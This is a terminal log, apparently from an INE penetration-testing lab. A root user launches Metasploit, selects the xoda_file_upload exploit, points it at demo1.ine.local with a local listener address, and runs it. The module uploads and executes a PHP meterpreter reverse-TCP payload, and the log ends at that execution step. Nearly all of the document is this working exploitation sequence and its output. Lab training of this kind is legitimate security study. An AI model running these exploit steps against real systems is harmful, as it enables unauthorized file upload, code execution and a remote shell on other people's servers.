┌──(root㉿INE)-[~/Desktop]
└─# msfconsole
Metasploit tip: Use help to learn more about any command
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| ?a, |%%%%%%%%%%%%%%%%%%%__ %%%%]
[% .--------..-----.| |_ .—.-.| .,a$%|.-----.| |.-----.||| |_ %%]
[% | || -|| || _ || ,aS$“” || _ || || _ || || _|%%] [% |__|__|__||_____||____||___._||%$P" || ||||___||||___|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| "a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____“a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `”$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v6.4.12-dev ]
- – --=[ 2426 exploits - 1250 auxiliary - 428 post ]
- – --=[ 1468 payloads - 47 encoders - 11 nops ]
- – --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/unix/webapp/xoda_file_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/xoda_file_upload) > set RHOSTS demo1.ine.local
RHOSTS => demo1.ine.local
msf6 exploit(unix/webapp/xoda_file_upload) > set TARGETURI /
TARGETURI => /
msf6 exploit(unix/webapp/xoda_file_upload) > set LHOST 192.63.4.2
LHOST => 192.63.4.2
msf6 exploit(unix/webapp/xoda_file_upload) > exploit
[-] Handler failed to bind to 192.63.4.2:4444:- -
[] Started reverse TCP handler on 0.0.0.0:4444
[] Sending PHP payload (nzqtDNA.php)
[*] Executing PHP payload (nzqtDNA.php)